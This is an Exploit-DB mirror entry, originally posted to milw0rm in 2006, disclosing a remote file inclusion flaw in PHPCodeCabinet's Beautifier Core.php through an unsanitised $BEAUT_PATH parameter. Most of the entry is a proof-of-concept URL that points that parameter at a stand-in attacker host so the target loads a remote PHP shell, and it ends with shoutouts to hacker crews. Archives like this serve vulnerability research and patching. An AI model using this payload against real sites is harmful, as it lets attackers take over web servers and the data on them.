exploit-db-mirror/exploits/php/webapps/2139.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

17 lines
No EOL
428 B
Text

>From Minion:
PHPCodeCabinet (all versions) is vulnerable to a remote file include.
The vulnerable code is in /include/Beautifier/Core.php
an $BEAUT_PATH Was not properly scrubbed, so they got owned.
Proof of concept:
http://target/phpcodecabinet_directory/include/Beautifier/Core.php?BEAUT_PATH=*evilsite*/Beautifier/HFile.php
HFile.php would be your php shell.
Shouts to XoRcrew & Disruptiv.
# milw0rm.com [2006-08-07]